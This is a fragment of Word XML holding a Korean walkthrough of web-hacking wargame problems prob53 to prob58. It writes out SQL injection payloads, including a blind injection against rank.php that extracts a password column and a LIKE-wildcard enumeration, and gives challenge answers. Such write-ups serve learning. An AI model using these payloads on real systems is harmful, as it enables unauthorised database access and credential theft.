          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>rob53</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D2B6B" w:rsidRDefault="000D2B6B" w:rsidP="00224D1E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7275ABC2" wp14:editId="7BC299F8">
            <wp:extent cx="1209675" cy="438150"/>
            <wp:effectExtent l="0" t="0" r="9525" b="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noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64BB99D8" wp14:editId="7CEAE225">
            <wp:extent cx="5731510" cy="3564255"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"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t xml:space="preserve">Error Based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ejction</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>같아 보인다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D2B6B" w:rsidRDefault="000D2B6B" w:rsidP="00224D1E">
      <w:r>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">에 </w:t>
      </w:r>
      <w:r>
        <w:t>1 or 1 like 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>을 넣어주면 값이 나온다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D2B6B" w:rsidRDefault="000D2B6B" w:rsidP="00224D1E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6824E692" wp14:editId="1030DD66">
            <wp:extent cx="5731510" cy="1416050"/>
            <wp:effectExtent l="0" t="0" r="254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noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6366D8EA" wp14:editId="33255AF2">
            <wp:extent cx="5731510" cy="1524635"/>
            <wp:effectExtent l="0" t="0" r="254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테이블을 뽑아왔다.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 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 xml:space="preserve">절 뒤에 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">procedure </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>analys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히면</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001E264E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 해당 값을 분석해준다.</w:t>
      </w:r>
      <w:r w:rsidR="001E264E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001E264E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">거기에 맨 첫번째 값이 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="001E264E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>데이터베이스.테이블</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="001E264E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.칼럼명이다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E264E" w:rsidRDefault="001E264E" w:rsidP="00224D1E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4084BB77" wp14:editId="6CE72ACC">
            <wp:extent cx="5731510" cy="1503045"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1905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385E41A3" wp14:editId="1B195616">
            <wp:extent cx="5731510" cy="379730"/>
            <wp:effectExtent l="0" t="0" r="2540" b="127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Pr="001E264E" w:rsidRDefault="001E264E" w:rsidP="001E264E">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E264E">
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="001E264E">
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>rob54</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E264E" w:rsidRDefault="001E264E" w:rsidP="00224D1E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32EA0718" wp14:editId="2E7B7774">
            <wp:extent cx="3333750" cy="733425"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7CD54BBC" wp14:editId="0313623E">
            <wp:extent cx="4029075" cy="5553075"/>
            <wp:effectExtent l="0" t="0" r="9525" b="952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369D2F2E" wp14:editId="7C2AC166">
            <wp:extent cx="2676525" cy="466725"/>
            <wp:effectExtent l="0" t="0" r="9525" b="952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264E" w:rsidRDefault="001E264E" w:rsidP="00224D1E">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>잘보니</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 패스워드가 계속해서 바뀐다.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>얘내들을</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 기록하면 될 것 같다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E264E" w:rsidRDefault="001E264E" w:rsidP="00224D1E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="434A1FBB" wp14:editId="143D6FF1">
            <wp:extent cx="2800350" cy="657225"/>
            <wp:effectExtent l="0" t="0" r="0" b="952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proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:t>nnerHTML</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">을 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>innerHTML</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>+=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>로 바꿔주었다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E264E" w:rsidRDefault="004A0AE8" w:rsidP="00224D1E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E7A3ADF" wp14:editId="4BEB14C0">
            <wp:extent cx="5731510" cy="283210"/>
            <wp:effectExtent l="0" t="0" r="2540" b="254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/>
    <w:p w:rsidR="001E264E" w:rsidRPr="001E264E" w:rsidRDefault="001E264E" w:rsidP="001E264E">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E264E">
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="001E264E">
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>rob55</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E264E" w:rsidRDefault="001E264E" w:rsidP="00224D1E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F1874B8" wp14:editId="0D8B46D1">
            <wp:extent cx="4924425" cy="1285875"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525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1430DF04" wp14:editId="116FEF16">
            <wp:extent cx="5731510" cy="461645"/>
            <wp:effectExtent l="0" t="0" r="2540" b="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rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">마우스를 움직이면 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gogo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>함수를 실행</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>드래그당하면</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">kk </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>함수를 실행이다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E264E" w:rsidRDefault="001E264E" w:rsidP="00224D1E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="10719BA8" wp14:editId="68A20299">
            <wp:extent cx="4857750" cy="3857625"/>
            <wp:effectExtent l="0" t="0" r="0" b="952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rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>랭킹을 들어가보니 다 만점이다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A0AE8" w:rsidRDefault="004A0AE8" w:rsidP="00224D1E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56367524" wp14:editId="5267A2DB">
            <wp:extent cx="2390775" cy="2085975"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525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E8" w:rsidRDefault="004A0AE8" w:rsidP="00224D1E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>랭킹 홈페이지에서 힌트를 찾을 수 있다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A0AE8" w:rsidRDefault="00512CFA" w:rsidP="00224D1E">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00512CFA">
        <w:t>rank.php?score</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00512CFA">
        <w:t>=1%20or%201=1</w:t>
      </w:r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injection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>이 가능하다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00512CFA" w:rsidRDefault="00512CFA" w:rsidP="00224D1E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08DC392F" wp14:editId="76AE39EC">
            <wp:extent cx="4819650" cy="695325"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525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>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A2705F2" wp14:editId="551B85F9">
            <wp:extent cx="5334000" cy="676275"/>
            <wp:effectExtent l="0" t="0" r="0" b="952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 w:rsidRPr="00512CFA">
        <w:t>?score=0%20or%20ip=0x3231382E3134362E32302E3631 and length(pAsSw0</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00512CFA">
        <w:t>RdzzzZ)&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00512CFA">
        <w:t>100</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00512CFA" w:rsidRDefault="00512CFA" w:rsidP="00224D1E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>참이면</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00512CFA" w:rsidRDefault="007B061C" w:rsidP="00224D1E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D2FA616" wp14:editId="318648DA">
            <wp:extent cx="4076700" cy="781050"/>
            <wp:effectExtent l="0" t="0" r="0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>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>거짓이면</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00512CFA" w:rsidRDefault="002C6379" w:rsidP="00224D1E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="36C2F02E" wp14:editId="5930AF5C">
            <wp:extent cx="4857750" cy="800100"/>
            <wp:effectExtent l="0" t="0" r="0" b="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5D" w:rsidRDefault="0051675D" w:rsidP="00224D1E">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">패스워드의 길이는 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>20.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0051675D" w:rsidRDefault="002C6379" w:rsidP="00224D1E">
      <w:r w:rsidRPr="002C6379">
        <w:t>?score=2147483647%20or%20ip=0x6C6F63616C686F7374%20and%20right(left(pAsSw0RdzzzZ,1),</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002C6379">
        <w:t>1)=</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002C6379">
        <w:t>0x12</w:t>
      </w:r>
      <w:r w:rsidR="0051675D" w:rsidRPr="0051675D">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="0051675D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0051675D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>를</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0051675D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 통해 계산하면</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0051675D" w:rsidRDefault="00A436F8" w:rsidP="00224D1E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44EEBD14" wp14:editId="14A2F003">
            <wp:extent cx="5731510" cy="1988820"/>
            <wp:effectExtent l="0" t="0" r="2540" b="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0" w:rsidRDefault="00195AC0" w:rsidP="00224D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F2E2F29" wp14:editId="636B4EAF">
            <wp:extent cx="2009775" cy="2047875"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="486" name="그림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/>
    <w:p w:rsidR="005C5FB3" w:rsidRPr="005C5FB3" w:rsidRDefault="005C5FB3" w:rsidP="005C5FB3">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5FB3">
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="005C5FB3">
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>rob56</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C5FB3" w:rsidRDefault="005C5FB3" w:rsidP="00224D1E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37173647" wp14:editId="654E7E34">
            <wp:extent cx="5731510" cy="2637790"/>
            <wp:effectExtent l="0" t="0" r="2540" b="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r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0을 검색하면</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C5FB3" w:rsidRDefault="005C5FB3" w:rsidP="00224D1E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40045AC4" wp14:editId="7EBE2299">
            <wp:extent cx="2562225" cy="1543050"/>
            <wp:effectExtent l="0" t="0" r="9525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r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>h</w:t>
      </w:r>
      <w:r>
        <w:t>i~</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>를 검색하면</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C5FB3" w:rsidRDefault="005C5FB3" w:rsidP="00224D1E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29BEEF25" wp14:editId="135719C5">
            <wp:extent cx="2609850" cy="1400175"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525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8" w:rsidRDefault="00A436F8" w:rsidP="00224D1E">
      <w:r>
        <w:t xml:space="preserve">like </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>구문에는 w</w:t>
      </w:r>
      <w:r>
        <w:t>ild card</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>가 두 개 있다.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:t>, %</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A436F8" w:rsidRDefault="00A436F8" w:rsidP="00224D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="42A6118B" wp14:editId="6BC68769">
            <wp:extent cx="5731510" cy="3110865"/>
            <wp:effectExtent l="0" t="0" r="254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r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>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속 넣다 보면 _가 </w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">개가 될 때 </w:t>
      </w:r>
      <w:r>
        <w:t>guest</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">가 사라지고 _가 </w:t>
      </w:r>
      <w:r>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">개가 될 때 </w:t>
      </w:r>
      <w:r>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>이 사라진다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C5FB3" w:rsidRDefault="005C5FB3" w:rsidP="00224D1E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">즉 </w:t>
      </w:r>
      <w:r>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>의 s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ubject </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">길이는 </w:t>
      </w:r>
      <w:r>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>개이다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C5FB3" w:rsidRDefault="008460CC" w:rsidP="00224D1E">
      <w:r>
        <w:t xml:space="preserve">______ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">에서 한 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>글자씩</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 대입해가며 와일드카드식으로 구해보면 정답은 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>kk.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="008460CC" w:rsidRDefault="008460CC" w:rsidP="00224D1E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1AAD60AD" wp14:editId="71181203">
            <wp:extent cx="5731510" cy="3195320"/>
            <wp:effectExtent l="0" t="0" r="2540" b="508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P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sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>prob57</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008460CC" w:rsidRDefault="00A436F8" w:rsidP="00224D1E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58E30A15" wp14:editId="2D61F64B">
            <wp:extent cx="5505450" cy="3352800"/>
            <wp:effectExtent l="0" t="0" r="0" b="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8" w:rsidRDefault="00A436F8" w:rsidP="00224D1E"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문제인 것 같다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A436F8" w:rsidRDefault="00A436F8" w:rsidP="00224D1E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="517D42CC" wp14:editId="14D57443">
            <wp:extent cx="5731510" cy="2937510"/>
            <wp:effectExtent l="0" t="0" r="2540" b="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8" w:rsidRDefault="00D952AC" w:rsidP="00224D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pP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 xml:space="preserve">로 값을 넣어주고, 메시지를 보내는 과정에서 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">se </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">변수를 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">select </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">하므로 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">time based blind </w:t>
      </w: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>을 하면 될 것 같다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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rFonts w:hint="eastAsia"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="008460CC">
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>rob58</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008460CC" w:rsidRDefault="008460CC" w:rsidP="008460CC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1BEB47B6" wp14:editId="102BB51B">
            <wp:extent cx="5495925" cy="3038475"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525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09812396" wp14:editId="77A034D5">
            <wp:extent cx="3324225" cy="762000"/>
            <wp:effectExtent l="0" t="0" r="9525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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79449DA4" wp14:editId="0066A3C3">
            <wp:extent cx="1581150" cy="523875"/>
            <wp:effectExtent l="0" t="0" r="0" b="952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386C849B" wp14:editId="1279284D">
            <wp:extent cx="3057525" cy="895350"/>
            <wp:effectExtent l="0" t="0" r="9525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6B70B6FA" wp14:editId="4CEDFF78">
            <wp:extent cx="5295900" cy="523875"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525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1687F653" wp14:editId="4B693D0E">
            <wp:extent cx="1123950" cy="990600"/>
            <wp:effectExtent l="0" t="0" r="0" b="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19E66A5E" wp14:editId="7ED064C4">
            <wp:extent cx="5731510" cy="2412365"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985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proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>H</w:t>
      </w:r>
      <w:r>
        <w:t>xD</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>로 열어보면 주소가 있다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008460CC" w:rsidRDefault="008460CC" w:rsidP="008460CC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A2FDB5C" wp14:editId="1D68D8A0">
            <wp:extent cx="5731510" cy="2088515"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985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AC" w:rsidRPr="00D952AC" w:rsidRDefault="00D952AC" w:rsidP="00D952AC">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D952AC">
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>p</w:t>
      </w:r>
